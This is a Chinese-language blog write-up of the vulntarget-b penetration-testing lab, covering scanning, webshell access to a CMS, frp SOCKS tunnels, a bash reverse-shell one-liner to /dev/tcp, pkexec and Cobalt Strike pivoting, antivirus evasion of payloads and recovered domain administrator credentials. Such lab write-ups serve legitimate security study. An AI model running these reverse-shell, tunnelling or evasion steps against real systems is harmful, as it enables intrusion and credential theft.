Vulntarget-b

0 信息收集

刚刚看到scaninfo这款工具,顺手试了下效果还可以。

{"ip":"192.168.1.114","port":21,"service":"ftp","Banner":"220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x0d\\x0a220-You are user number 1 of 50 allowed.\\x0d\\x0a220-Local time is now 14:48. Server port: 21.\\x0d\\x0a220-This is a private system - No anonymous login\\x0d\\x0a220-IPv6 connections are also welcome on this server.\\x0d\\x0a220 You will be disconnected after 15 minutes of inactivity.\\x0d\\x0a500 HTTP command: [get]\\x0d\\x0a","url":""}
{"ip":"192.168.1.114","port":22,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"192.168.1.114","port":110,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":25,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":80,"service":"http","Banner":"","url":"http://192.168.1.114:80"}
{"ip":"192.168.1.114","port":81,"service":"http","Banner":"","url":"http://192.168.1.114:81"}
{"ip":"192.168.1.114","port":8888,"service":"http","Banner":"","url":"http://192.168.1.114:8888"}
{"url":"http://192.168.1.114:80","StatusCode":200,"Title":"没有找到站点","HeaderDigest":"server:nginx","Length":1326,"KeywordFinger":"宝塔-BT.cn","HashFinger":""}
{"url":"http://192.168.1.114:81","StatusCode":200,"Title":"极致CMS建站系统","HeaderDigest":"server:nginx","Length":14398,"KeywordFinger":"","HashFinger":""}
{"url":"http://192.168.1.114:8888","StatusCode":200,"Title":"安全入口校验失败","HeaderDigest":"server:nginx","Length":802,"KeywordFinger":"宝塔-BT.cn","HashFinger":"宝塔-BT.cn"}

有两个开放的web服务,一个是8888端口的宝塔,一个是81端口的极致CMS建站系统

宝塔有点烦,看看极致CMS先

1 打点

扫了下目录,基本都是403,就readme.txtadmin.php有用

readme.txt中有版本号 极致CMS Beta1.8.1 ,admin.php是后台登录入口,搜一手漏洞,看到了先知上的这篇文章,弱口令试了好些,最后试出来admin/admin123,按照步骤操作即可

用蚁剑连接,执行命令时发现返回ret=127,需要绕过disable_functions,直接用插件绕过

2 内网信息收集

当前主机ip192.168.1.114,查看网段。。。发现没有响应

换个大马上去,发现大马执行命令提示不存在

换了个思路,用/proc/net/arp查看

小小火说可以用/sbin/*来执行,因为没有加到环境变量里(默认是/usr/bin

发现存在内网网段,10.0.20.0/24,以及存活主机10.0.20.66(arp表)

使用scaninfo指定ip,不探测存活进行扫描./scaninfo -np -i 10.0.20.66

{"ip":"10.0.20.66","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"10.0.20.66","port":8080,"service":"http","Banner":"","url":"http://10.0.20.66:8080"}
{"url":"http://10.0.20.66:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""

3 内网穿透

使用frp进行内网穿透

在公网vps上运行frpsfrps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7788

在目标机器上运行frpcfrpc.ini

[common]
server_addr = x.x.x.x # vps公网ip
server_port = 7788
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5

运行./frpc -c frpc.ini,服务端接收到连接

4 内网主机-1

10.0.20.66:8080,禅道管理系统

访问http://10.0.20.66:8080/index.php?mode=getconfig查询版本信息

点击使用demo账号登录,进入后台,使用CNVD-C-2020-121325漏洞getshell,但这个漏洞需要管理员账号

好兄弟告诉我账号密码是admin/Admin123。。。

使用python在10.0.20.30上起一个http服务,python -m SimpleHTTPServer 11881

按照漏洞利用步骤操作就可以了

是个低权限用户

有域vulntarget.com,在10.0.10.0/24网段

tasklist /svc发现火绒

5 搭建二级隧道

一级代理不要断

部署顺序(先服务端,再客户端):可出网主机-服务端---> 内网主机-客户端 ---> vps-服务端 ---> 可出网主机-客户端

vps

[common]
bind_addr = 0.0.0.0
bind_port = 7799
allow_ports = 1000-2000

可出网主机-客户端

[common]
server_addr = 47.102.44.211
server_port = 7799
[http_proxy]
type = tcp
local_ip = 10.0.20.30
local_port = 1080
remote_port = 1080

可出网主机-服务端

[common]
bind_addr = 10.0.20.30
bind_port = 7799
allow_ports = 1000-2000

内网主机-客户端

[common]
server_addr = 10.0.20.30
server_port = 7799        
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5

本来是想挂代理上大马的,结果一直没上去,就用代理继续往下打了。

6 拿下域控-方法1

把scaninfo传上去,扫了一下,直接拿到了域控账号密码(scaninfo牛逼

{"ip":"10.0.10.99","port":445,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.100","port":88,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.99","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.99","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":445,"service":"microsoft-ds","Banner":"\\x00\\x00\\x00\\x83ÿSMBr\\x00\\x00\\x00\\x00\\x88\\x01@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x06\\x00\\x00\\x01\\x00\\x11\\x07\\x00\\x0f2\\x00\\x01\\x00\\x04A\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00üó\\x01\\x00M\\x7f\\x81à\\x9c;Ø\\x01 þ\\x08>\\x00\\x89ÓÀ\\x0bÁ]µwV\\x00U\\x00L\\x00N\\x00T\\x00A\\x00R\\x00G\\x00E\\x00T\\x00\\x00\\x00W\\x00I\\x00N\\x00-\\x00U\\x00H\\x002\\x000\\x00P\\x00R\\x00D\\x003\\x00E\\x00A\\x00O\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":25,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.100","port":53,"service":"dns","Banner":"-NOBANNER-","url":""}
{"ip":"10.0.10.99","port":25,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":8080,"service":"http","Banner":"","url":"http://10.0.10.99:8080"}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n   [->]WIN-UH20PRD3EAO\n   [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100    [+]DC VULNTARGET\\WIN-UH20PRD3EAO   Windows Server 2016 Datacenter 14393"}
{"url":"http://10.0.10.99:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""}
{"cve-2020-0796":"cve-2020-0796","host":"10.0.10.99","port":445,"result":"[+] 10.0.10.99 CVE-2020-0796 SmbGhost Vulnerable"}
{"smb":"smb","host":"10.0.10.99","password":"admin@123","username":"administrator"}
{"smb":"smb","host":"10.0.10.100","password":"Admin@123","username":"administrator"}

用搭好的代理rdp即可

7 拿下域控-方法2

因为蚁剑的shell是无状态的,比较麻烦,所以在可出网主机上反弹个shell出来bash -i >& /dev/tcp/ip/port 0>& 1

查看系统版本信息cat /proc/version,cat /etc/redhat-release

查了下有好几个可以提权的cve,但是运行时会报error(环境变量问题),所以要另寻出路,cs也用不了,只剩下msf了

搜了下msf有自动提权的插件suggester,试试看

(中间因为vps上的msf加载suggester的插件加载不出来,所以用的frp+本地的kali)

后来发现是最新版本的bug?又转回vps,使用pkexec提权成功

shell进入交互式shell,发现在root目录下有个flag

运行cs大马,上线成功,而且执行命令正常

生成一个pivot listener,相当于中继

因为4.2不能拿到pivot listener的payload,所以用web delivery,然后下载,拿出shellcode,然后免杀

上线上了老半天,上不去,我猜测是linux的session没法pivot

换个思路,让他出网上线,用goproxy,(第一次开启状态ok但没法用,第二次正常)

创建一个走代理的beacon

生成stageless的payload,免杀,上传,运行,上线!

搜了下补丁,可以用CVE-2021-1732提权,但是火绒直接给杀掉了,先不提权了,做下信息收集,10.0.10.0段除了本机,只有一台存活主机

scaninfo扫一下,确认是域控

{"ip":"10.0.10.100","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.100","port":88,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.100","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":445,"service":"microsoft-ds","Banner":"\\x00\\x00\\x00\\x83ÿSMBr\\x00\\x00\\x00\\x00\\x88\\x01@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x06\\x00\\x00\\x01\\x00\\x11\\x07\\x00\\x0f2\\x00\\x01\\x00\\x04A\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00üó\\x01\\x00\\x96ë«W`<Ø\\x01 þ\\x08>\\x00+\\x011Ø\\x14lÃ*V\\x00U\\x00L\\x00N\\x00T\\x00A\\x00R\\x00G\\x00E\\x00T\\x00\\x00\\x00W\\x00I\\x00N\\x00-\\x00U\\x00H\\x002\\x000\\x00P\\x00R\\x00D\\x003\\x00E\\x00A\\x00O\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":53,"service":"dns","Banner":"-NOBANNER-","url":""}
{"ip":"10.0.10.100","port":25,"service":"","Banner":"","url":""}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n   [->]WIN-UH20PRD3EAO\n   [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100    [+]DC VULNTARGET\\WIN-UH20PRD3EAO   Windows Server 2016 Datacenter 14393"}

测试了一下,发现在cs里运行提权脚本是不会被杀的(迷惑),但提权脚本需要按下任意键继续,查了一下,可以通过echo来完成

但没法用在这里,然后修改了源码删掉了pause,找大哥帮忙编译好之后,运行被杀了。。。想起来之前没被杀是因为没有输入回车,没有执行下去。

然后把exp做了个免杀,还是不行。人已经麻了。这块提权要靠msf,直接把exp加载到内存执行,且逻辑完整,不需要输入。

鸽了。。。vulntarget-b得用msf才行,暂时还没用cs打的思路

posted @ 2022-04-02 21:42  R3col  阅读(522)  评论(0编辑  收藏  举报